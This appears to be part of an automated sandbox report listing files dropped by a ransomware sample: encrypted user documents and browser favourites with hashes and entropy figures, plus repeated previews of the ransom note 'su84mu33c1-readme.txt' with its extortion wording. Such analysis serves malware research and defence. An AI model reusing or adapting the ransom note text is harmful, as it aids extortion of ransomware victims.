          Preview: _....$2.O.........7#..0.L.....$}V.C..P&....Q...3/.V.b..).g.i.......zW..^f..1+.A.7...|Z..q..L.._...^..|.k.P.......X2b.....>z..zD.4.%...X.#.......E..b.......Us....4X.sc.....J.?...=....f..X...EXN..C..#.......@..-..... ..G.[9..;.7?8q.?Hg..T:.b.f.G'RX..V..L\...\.fe...k....=.b.|H. .`..$:.J..)!.+..!...4V....i.<.....i....s?J.!m.SY..U.C.(...m.Pe...n.~..:<I..s.....f...NW..Ai.Y*..L....3..~^B.=....A.\n4A..(.]...8P.$.4..f..6.7\........K.J.U..I.S.#B[6;.d..L.L.L9......./...S......+...8h.*7......I=.T..S....Ey!...+..d.L.....I...5 ..MU...w.K....UM..E1.6L3.......,7..J.OI.`nM...v.......K.f...F.;..9..|..i...........=1.J.o.........a.....]M-.s...g.z..{._..(Y.5.....2..n.KN.8.NW.n.... ...4.(.s....#%L<..'....#.I...y...q..,sl.xQ.h.b.I.XhbZ....)C..G.pN.....T.....q.."..9.|.9.......z....]\.E...J<.u...[.7.G....TD$#..V.(...3.-.j,...|......s.#.6r...-.w.........9.q...m...X...F..e....M....W.j.n....U+zJ..n...h....9.q.r.3a+^.C.pj>....k>j..q.N3..#..<6...&......N<....y..,.#?O.....
          C:\Users\user\Downloads\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852965457183226
          Encrypted:false
          SSDEEP:24:dsSuwVJn7GCd9h5Qff/kFqBhzR8pvfE/hJMVwd6fxBp4oo/F/JXADn+zZ72:dsSrVt7GCDnyU0zAXEHMVDfxYooPu+1C
          MD5:5CE266A8E7ADEEED81B2A5FFF6C92FD5
          SHA1:C126C6647760AD3BA115E35704B4A14271EBAA76
          SHA-256:A3A69D0A413FC55A5843D9FAF05CB930C3A30E955B79F5DF801F764FF4D56093
          SHA-512:51C2E04B491A001E246F348F52F563C74B142F3F204A9A4BCE9D1F1AEAAE9D5FEF6FB509BFAA33B110102BC16064CCC6D0F396C96C80E1C516A051F8BE0F48FF
          Malicious:false
          Preview: .......5/f..:4i...F[Gf...@........7...^...d.[....wAU..V.G&...z.r.RD...(gDR...m.1.F.dK..I.....Y.U...b.JDM........Y..B@.0..|...z...W....v..@N.I.v..Z...h( 7.|\[.E.......=..C....b.)+..qv..e..N..>.<......].V...k.Gk..............jQU.."..-.V..@.7l.j......._..~.........f......c.Z}:G-...4..O.-.|.d...=T...F..QA....mN;.Dg..`.^.R..g.1c...1...%......8.4A..B......A..L....e5..<4)..9]h.&.2P.Q.../.H(......E....7..e.......? ...Cj^.n..]...M.C.e8.....k45.....1.82.v..p5H.mG.`.... ..&9t.qg%:3..L...c_..TZR.....VZ....}M..0....5.:`.viUt....B.y..S.0...,.2....RF....l5?.X.!lm5E.A.b_.|...>.TC|uY...UB...`x.......Rx..WX.PD...|.....z .`ShA.l.....si...9..+$..s...M.[.*...7.f........My....._.|...s".0.....I.@.....(2..[..yz.....=..2...q.GW... .c..|A_JJ9.%..X..h..qz..*..6.(...=..U...e....4......8zC.F.'...(:....YQ/....PUL7$Li.....,..X0.t/. 4......V......0.0z.J.=L....$#..C......`..>2...i!..$.n..@peP.B*..r.(..../k.Bw.}]t..HB0..."+.....&KX,...q. .d......u...J.&BFc.0...._q...
          C:\Users\user\Downloads\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.818937946763837
          Encrypted:false
          SSDEEP:24:+l8LucZnGOUAJIMW+p6tIY+22V/PF0nz/B96TYmJ7K7QXADn+zT6I8:+l8LL3q4ZX/Gz/P63Mou+b8
          MD5:C741723022F5F34ECA5C16B26182A95C
          SHA1:D7B6D5050511404143D7B4365D70071608B6E718
          SHA-256:E2FA433BFA1828BBF5C98183AD69FCF7E4E48D5793AD0118C56EC16D6CC2C7A3
          SHA-512:6F5ECD87F865D2B439464ED1A904B06CF4AEE316D8DF47337ABDF6C09FAED5E6E1F2584298F0A58A80862FD37D464DF86B9F0F4BC941E6E432379FAF4F935B60
          Malicious:false
          Preview: ..K.D.M.1.da.!..GJg..w..> y....u.....O........E...._.[..<0.G....s.d..{...M.V.9..v.v..y.Md..,..n.4..f..g....:%.4.v.#G0.w.40W.3P;.....?~R...-c|i...(e5KM:g.v..L.. %U3$..w.1.V....p..2!].........s..{$].'..N...../..=/.~`.&.~.......2+."..0..@.......V[-a7`........s.zt.]..Q...... .R.1h..Y..V.....,.w+.... |u5.c.p.rnE.f#.....+nI...+...o..X..W..d;x;YB[(S.n.Y..........<..K....|...0....h&E..CK.......X.Z.......+..n*i..A.P..tz.b...^%c..%....I..w..l...7c.Ld....)O...*.}6@...z.Q.......E..........b.?...........=.Aa..og.4.~.t.s:.f.I...?..Q.Q.\e_.x......W..L@Bj.*,x..<......V.....z...w..J.....7....<...r5.Z.y.H..}.C...|..?.;P.&.z."~..8...s.....[.PE..."B....O.A...l.9..K.D.......N..|.7`.....L...)..0l.=..."[\L..o.4...d..c....(..+j.......F.[.....g^..ozGD.(..........m.....3?^.TO..BS.M...i.......L...h<....y...B.7+..G..$.....q.Y7Oo|-W...w..<.P.7..j...`...y !..g;x...).<.&...\.....V..y/.7jAL.m..7VM..`...;3$y....._".W?........o..D.v.&x.......-0.S 2Xr%.(.../u:..<..C.
          C:\Users\user\Downloads\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862112494968726
          Encrypted:false
          SSDEEP:24:K+MwAh+eylCZZY/hzw0x/JI78uHa5y3o/NfYGgNp9YqKgUQdKycowPlk6wXADn+S:K+lFUZP088N5yY/dYX9jeQkPdk6Iu+JQ
          MD5:B0D2E882A19556BFB46CAD81B0C89290
          SHA1:4E3FC8D8F2E11C6953463E56E44B7CCF27C04DB0
          SHA-256:890B81FE2792C19F49876F066A10D40A698A8DBF258EC8C6D1CD38C8D397E693
          SHA-512:BD1596D5CEC018DE3086143CB74A72C518920498976A2E7357BA581203AF0157553E40E4B900A4AF5FD0D55B5839297202B0866CDD5D88B9957E25FE3FF9A347
          Malicious:false
          Preview: .T.,.v....|.!..M..+`.......m.....k.^.m../#=h|.......O..x.wT...|?.g.2...;o.sxy.y......uz..B..3...<...y{B.7._OT.b.:..Z..a"D.....!.J..).I..B.W...8S...s:...F,u.<....@U:V..`...#...;B F.L4.J......d...~V0.)..I..T...QH#-J...._C..b6....pp............k }p....P..#...e...bh..imsH..Z........]NPQ..0..W@..v.....w..dU.p.+....8..3..=........|...A."@.II...4.....;..Q.."...?...*.$k5f.....d:=r..`...;k...8.nT...\h.f..}V..'.2k*.7.$P...S.:~%|.EhT..>..&..,=6m/.....711.L...Q6.............\.U.i?g._U.E...O){.7..]...9R+.+.z...W..+T..!9....d...O..Zk..G.h)D4.h.C.xp..m.K..;G...52c.oW........P..20.*^S...\9%...o.A..... .....-..^8f[......}.x.o&.R....)..*...P...K.1...F.#....Q.s.._g..z...}....k...\...1..Z....yG.R....u..s....X@n..%..Y8.P.J..1z.+..>.l....n..4.7.fC....Tc...j<.%.0.A..1...K....Z,.......b..SM/.Lfj...,]T..A. ..:..+.;#O"...O.5L......[..n....>)...Q....e#..3P..7by..E._O...C...2.......y.R..k..6/>mh.S...q..)....~..3D.Y.AE...+!?k,.."W.]kfw....D......f.e..!..2.
          C:\Users\user\Downloads\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.845697428329967
          Encrypted:false
          SSDEEP:24:a+yJznkpo072IT5PcOYc9d7FIa8atOOaXacimfbUwXADn+zD3:a3UKIdcNo/tOOaXachfbTu+v3
          MD5:34FC61D67FDBC404843FF73AED62E718
          SHA1:9120509695D0271C7E112E45B7C5E2DF3C4EC30A
          SHA-256:4A26C71B2173CC429F292E07B9F6F4D6585999C8DCCBB4F37622AE900E333587
          SHA-512:EDD39E19B2E70DF3B47C83E71003672641E873F3E992442683081BC8D49CED419DFE90770A381584A1EB11E0A7BACCE741D87E8DDD11ABEAAED1D4AA9A67579C
          Malicious:false
          Preview: ..l..d.P.s..QP<&D.]`.l.Z.0.m.(>ji.hYC.q0-...9}.T...&x....=..W.....R.#oVr. 65.P...k..'L.j...<.$.&.P1.7w...k.....@..7q.....JJ.y.H.<`.fM!.M#A.-.m..Z...i.*.gT.A.'..7.+.Zph....Ox.J.i$;_{.).,...]0?Bsn.t.....8.'{j*.....A.h5xW... '.bt6..........k../.....t..^..P.\..:0....`..cY..7.n.dN....,l2p.....3A.....'O..J.g..+.!.$d..[.sW.8.#..\.)wc.}.oh...+n.....;+.evC.6.qu..Y@.:...!.d.._.K......B.m.h;..m.mW..b.v.H..^L.D!<.$.....(...e.u...l.j&.........>......}..........v..z.....Ly..(.Q..O.Z.+..Q.....%;6t.?.j...>...f0...3.....M....[s6.jw~N.X...7....5.4...&'n.Q.....(.Ps....0n.'.3.@.,...8..D.h.o.K.kq.....[v..W.d.@w....8]..bx....V...r..;Fi ....w..=.;..6...]@~I.gn.....1..sV#.;.0C..q...r.m.bU.@...I.X..a...R...eBK#FPd.....Vb.y..}.;.a.ES..].....V.&.m..;...s~..\4P.!....60.:...UJ..g..$&..q.j...!......:..........U....V..n%...L9M...*.4...o...0.F...%M..Q.J.M..|.9QC.....P.B.. #.W.cm..-.l?..NED8./.T*=...1.W..1..#..w....h....m%3.k.$......9[....$.<.N..z.'.......!..1.W3.
          C:\Users\user\Downloads\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.85134024403049
          Encrypted:false
          SSDEEP:24:Ett2enDDNwAUkYywF+r7uuslG41YjffnztE0NfkLpL8WMpXADn+zpz:Ettjn3NLUkBwgRsNEffzO0NEpuu+1z
          MD5:199AB8B704A08F24ED0F74AEAE269354
          SHA1:40543E587C71ED793EC1D17D23CEB6EBB0973FC6
          SHA-256:ACF88145C61C2ECCEAE35A66C7222F1A7C94DF14BBB23EBB0020BDF21A6CB463
          SHA-512:537E60AA8F56493BE84E23C570AD2D8CAD634115A6C98B769A5EEE4851E71CDD3808DF52B84A335F424A4DBC67A686AC35CD5A6527E61E4A226692C77BFAD9CF
          Malicious:false
          Preview: ......7...w..4.a0 ..6....j+c.......1V. '.v......Ak../S...m.y..x...*.i...3.*c.3| .t.t'...4..?...g.E}q...k...j..;.k.Y.....<....b....w....G...nI.,.1......[.....|.........E~S.'...h.....9..M|.K.x3..7~.;+..W...F.....w.5DW.`;.MT..C..'...p..:.\..-_.@...~k(....\.o.V..#...U......M.S..r...f..Z....|ZG2LP:...J.......+O.}\;...+_.\.}L...A..[j....T....8k0..... '.L~.!.5VG.&&[$ydt>PZ..|..."R....%R!._.=.A.#..8.........L]^..WG...?J....j%....3..v.H .zmK;ZM.2...c9S....e....K..JG.s...Bs.A....u/..1...@.'<S.[Q.J.".3.Q\#..74E...y.W..jn.r!.*b..,.o&t3.y.<..y.Ru.8.#...D=..>.d..4...s...!u..b...A..Sq....x...5....C.5.eKR..cxu...$..7..............P02..../,...{^...W7G.M4...........N.. .f...L. 3R......>.b..^P.h.]:..W/K.H....H........L.F9V...9.~.|Mb..)/k.~.3..^.%W..K**W-Z.......Q.|Y0.D.b..AoC.5..o.6<..pw.33.h..q|.7D.....ZE.z. .....Gs.....p.-......i.......M...V..K.....xw....As..Rou_<...W.v..X8.!l....S.H.Z.....U..........,tW*........`^C.J..e....0..f".k...Z..&d.?:.A.....BL
          C:\Users\user\Downloads\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.83408625165927
          Encrypted:false
          SSDEEP:24:ocNfRK1Hso7ju9R55Yq1kin/WAPqMA/sO3GcUXADn+z3p:ZfsqauvY4B+rMqsO2u+7p
          MD5:2DFAD0EAFDA4CB8B2A9396438101E5D6
          SHA1:8D6D0DB3E93EB29D1A6A75C93AADA1966E693DA5
          SHA-256:8423597213163AA780ADAAA36BE229EE8FD6B961F5A3D52864EFFFF81C5960AF
          SHA-512:A84CCD08A8B05888F94DFD997C54FE7099DD2C3E9EAF7F45162E75429EAA3055C127821FB0433839AD221C34CC057CC7646719B1B74031A8BCEEFC6ABE7EC195
          Malicious:false
          Preview: .......9.5oX[. ..k..{..&.\%S.i.5.S..c.$b...1......P.\..WV..2H.%1@..h~..F.r..>F...6.....lJ.....G..i}Hk/...y.vY;...hYV.@.D&.(rX.....cQ.....}*...i...Af.N3....."sk.tL...{..0...-g=r...UDB..?L...5.b..S..<0.ab..t..!.._.......Ug..'.Ch.......h..X9...T.sA.D.N..r..15.|%.j...T..!.I5J..U{.|t.7.y.U..\.$..C..UL......-.>W..>..I.q...y...f......y.`A.u.vU..9...A.`.b.|.^.h...p].v.L..L.p.U..;O...Dh.H.v.wof....W.J...PS.$...`...]".....N>.....-........D.RD.R2............a#^v...... jcX...$....Vht+o..8..N...N...#D#E&......j......~....)}?......... ...Nt.:..g..N....z...V.=.7....Mt.....8...Pk.<.....)...4r....A'..Y?....'........H6[e~......K.h..g.z.L.S/.....wI.<.;..+8]g.N..a....A........FR..q.Q.'........G...).+R...i..>s..."...._3.6s....V5.i(.Ul..<..v..!l...A3&...J..5......m..W.(.'....g....p{D...Z.....Nf`.8...u..;k(.H....,Pdr.z1K;OV..,...}.EJ..*.j?a...7C.<.q<.qZ.|...k.v..~,lx......H.b.!.e...B.....Iq..5.C...$..tkBw.fO..H|.m.Q...Y^....{`z...w...2.!=(Nk%....<+.".7..
          C:\Users\user\Downloads\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Favorites\Amazon.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.360708058190692
          Encrypted:false
          SSDEEP:6:elnb2z1ggqy7hvpul0u1yh/1oXk+vYro1wANxP7GjqhT6/XKArAGyohQ1QUM1:ex4FNvEu1j86ANh7HT6/XKArEBM1
          MD5:082D6F8C9385EEB2907743F5747358C5
          SHA1:1CDDA3020CD8BA0065AE59E24655CACAD435ECC7
          SHA-256:9DE3C5C7375CDE58CD6D8BF47352EEAAD58123F771136244493915B937F381A4
          SHA-512:EA7091FB317B4934CBC6BBEEF97D78235E38E3FD79E3F9B0565CDFC98EABD26AA528358221C6EF2F1CB614CF0EF61C9FAECFE98B8681BAC2E8084DC9CB047806
          Malicious:false
          Preview: .i=.ll.k/#..*..pW.!.*.V...kp.8.L...I..d.=>...8....L..:.u...$...O.....Uum.......w.....S.zX..Rq.=.^..A.+.....gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|..k..q$h.a.pP..g..1....g..c..2.......;............LDq.
          C:\Users\user\Favorites\Bing.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):440
          Entropy (8bit):7.521497681152624
          Encrypted:false
          SSDEEP:12:/w68i5Baxudz91YyJ1j86ANh7HT6/XKArDf9tKOlltGZ:RVcxudZ1YyXADn+zDf9tvX8
          MD5:ACAAADF5B11F663E235E6394D89BF579
          SHA1:EC2242241765BD37D2661761CFE27931F5703FBB
          SHA-256:C9A02F3B81432325DDAAB7C6C784C01C4955E63C369E8FB1310CD05B7D3796E2
          SHA-512:AF5562BCAFB1F83397DF742E2A20976D820B7CD71964FD2BBBC673C82CFE7E4243448FEAD032BF87340301632A73E7CFF2254761E8EA3D09870B905B93548F39
          Malicious:false
          Preview: ..p$>Xb.&.....C..!x..... ..RhOl.T.....*....CH>.[..|.!.t\.^;_..W...b..&...Tj_.T.<U..;....Q].?.@.q.|Q.o.B..l.2.v.X.4a...x.'.....?._..K..,...ak..??.3.S;...W.....@...=+..X.R...~H.....)P....R..V...G....gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|h.R.|...P..-9.L..)ht..A.*f.$.m......./AE............0
          C:\Users\user\Favorites\Facebook.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):345
          Entropy (8bit):7.384697216731254
          Encrypted:false
          SSDEEP:6:Vdy7VVkPZ6cdpEE2/1oXk+vYro1wANxP7GjqhT6/XKArAGyoZG+XgUmFk:Vw7rkkcK1j86ANh7HT6/XKArOFk
          MD5:8CFC62441760458FA31AC6D611C7677D
          SHA1:C04F20448A7281B0CEE740AE864C47DC227C2CFA
          SHA-256:C2CDC84909F04F83D8BBC386D6546A65AB221636E72D36E901363894E2EAABB0
          SHA-512:A37A1424A8F23CD9CA887E4A4835BDA4DF20D8F382521CD7E564C62CB6DF47B8841F531D553D8ADAA8D7F6A03C95DB5C898CAAA5E179C7996E52E31852300DCC
          Malicious:false
          Preview: h......(.........f7.9h....!.......B..$..&ri..;...~....... +.X.K3.......fe4u.q5). g..;kJ<.}.Q-i...o.n...S..g...gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.v!.a/q.....$T,.7.,..;...bWkjR`.tm.@.|_..]2........<ApA
          C:\Users\user\Favorites\Google.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.343738509572857
          Encrypted:false
          SSDEEP:6:WoRbZOMrsuTWcJYLg9Ys73Dl/1oXk+vYro1wANxP7GjqhT6/XKArAGyonklilp:ltZDrQVLwYyx1j86ANh7HT6/XKAruli3
          MD5:ED4C4921E1FCDEA28FB88E212BD05F8A
          SHA1:DE16B7D60655F2C70351260BA2017827FAF4C5D1
          SHA-256:5F200DD3B89D034C44C0D81CC8E29E4F02D92C28D5DEA5D6E820B02A67AF5D63
          SHA-512:BA0275A449F3A2E2009961FFB3D268601215359579B3C56D49417AE0597CE020AECD2AEF5234BFF417ED2F5C208F55D58C95E1C59ACBC042F7ED95D51145EA6A
          Malicious:false
          Preview: .J.].....g!R..A....6..V.-..'......i._....}c.@wT......-iY.Bp>'!...U..$..%.....9..O....,..xO9".$-.-?.B.0Ow..L..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.irt.N....%.......+kx.Q....Q....)Z$.\.(J!..........E..S
          C:\Users\user\Favorites\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Favorites\Live.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:DOS executable (COM)
          Category:dropped
          Size (bytes):341
          Entropy (8bit):7.319753579928835
          Encrypted:false
          SSDEEP:6:QQw1tDoQs1CkbTl/1oXk+vYro1wANxP7GjqhT6/XKArAGyoTN0N4f7:QQIkXXT91j86ANh7HT6/XKAruQ
          MD5:FAF2DD716737CE792425B6F5BF254F04
          SHA1:A625608E38971759E3682D417A68622EB89BD328
          SHA-256:C007EE267C3B86D6D0E778AF4289F44EEB01EEE4BBE32732F0F9AF956A237F34
          SHA-512:4A016A429751537B952720E585C110EBBBE4D29A6D69B2D1C797AAE5407885021880DF13699EB87FA57A246F5927EDB7FA64914B3612EABAEA8DC9BE5E04C910
          Malicious:false
          Preview: .d..U..&3...{........t.4..6j.N..-..=*...p..`.S..T.........U8#YC5............./......Dg*....!.q=DH..R..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|...f..<.hN..T......v...D...P{K..`b..Y..a]..........].
          C:\Users\user\Favorites\NYTimes.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.41194918481912
          Encrypted:false
          SSDEEP:6:G9i10AoK3Tc/H/ggD4FGs/1oXk+vYro1wANxP7GjqhT6/XKArAGyoYIDoRgp1/+A:CxAt3Tc/431j86ANh7HT6/XKAreIPll
          MD5:AC28FF9833D49A33F196F36C6E5A1311
          SHA1:8134B9959629C1B8488138F22FA7EA054B561003
          SHA-256:E3A266DFD530E1707CDD59969442647A7A8526B9B3D1DF8DD780020DBD8F6A7F
          SHA-512:1A14B3D89F0DB6EC4E4F09FD06B76F5ADBC83604FC9FED49C1E66BFFD57FC385F2F17FE455559B35E39384CA8C560BB0E14F87D4FBB9C7A80D13887E5A316793
          Malicious:false
          Preview: '.[.f.s....9C.P..d_.muL.."....A.'.r#...&x%l9I..i.H.V.b...q..2..J..t/...zk.7lUqeN....+.W.v48.[....o...o...gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|?..6.cH-..|..r,w.ch\.r[.O..F.f..r...E..p.........W^.
          C:\Users\user\Favorites\Reddit.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.382834455736758
          Encrypted:false
          SSDEEP:6:5AHzmpNUoRjirHKDIFwNAfj6/1oXk+vYro1wANxP7GjqhT6/XKArAGyo31gk6Q5O:yTmpNxMKDAfO1j86ANh7HT6/XKArxH5O
          MD5:FCCEDF535B980C099CF5BBB08BCF60F0
          SHA1:BD21FE275BCE5F160776E922EE8589661D4F55B8
          SHA-256:66139BC137D02DD6F7FCB51A264B90A812760875D4FA0A2FE35D4F2A023A2CA7
          SHA-512:1BBA77E948E5F186F80143CD737FECD1B1A53E28985802F56F50C77B107118DE2A5013177EAA3EA9FA917DE8D27D5DFD52369E9F07DBF63D9A8A18F96F2D712F
          Malicious:false
          Preview: ........K>.E.....`.s?(3..1.....OdD.t...O.s.{..e..N.BO;..i.../.4.K.].p..,n..gJ..3.TC..)'."..Go....0Tva(PF..{Y..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|-.Qh.r....A..X>........B..\._Z.@..._K.$t.........Gr..
          C:\Users\user\Favorites\Twitter.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.386133532141108
          Encrypted:false
          SSDEEP:6:CAXL6f1sLsyLwt9/1oXk+vYro1wANxP7GjqhT6/XKArAGyo94i2ZWy/Wp:C2L6fqoOg1j86ANh7HT6/XKAr/4i2Zep
          MD5:6566507248990DD555A44CA02F7C5B5D
          SHA1:74569E2D503A72A3CDFEA57E4C5EB1F08AA8F6EA
          SHA-256:B3560283EBFDE7E2B9AF728A352F9F16A604C00B8F09E765019F15BDCEE13DE7
          SHA-512:0787525F2D7B80815A0764809618CAB4A5661F2E3A145916A6B3E7828830AAAEA5B2797A3B795CFA6FDA4326EF4325CC18B841B0D1209EDFA5B8F53812C58860
          Malicious:false
          Preview: n/.k.;....LK...y0.,.p......L.u...-G.V.iAt..*.x..Oq/e.$..c...p..<.%..J1sOE......v..F...2.uU.(.w..k..(i.6n.......gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|k.N...n.Q$..i.]f.J....&glE..0i. y...]X..............C
          C:\Users\user\Favorites\Wikipedia.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):346
          Entropy (8bit):7.33824137946001
          Encrypted:false
          SSDEEP:6:0snMwKNtRXNrWkEW/1oXk+vYro1wANxP7GjqhT6/XKArAGyo/4IOll:0SMwKNtR9vX1j86ANh7HT6/XKAr6ll
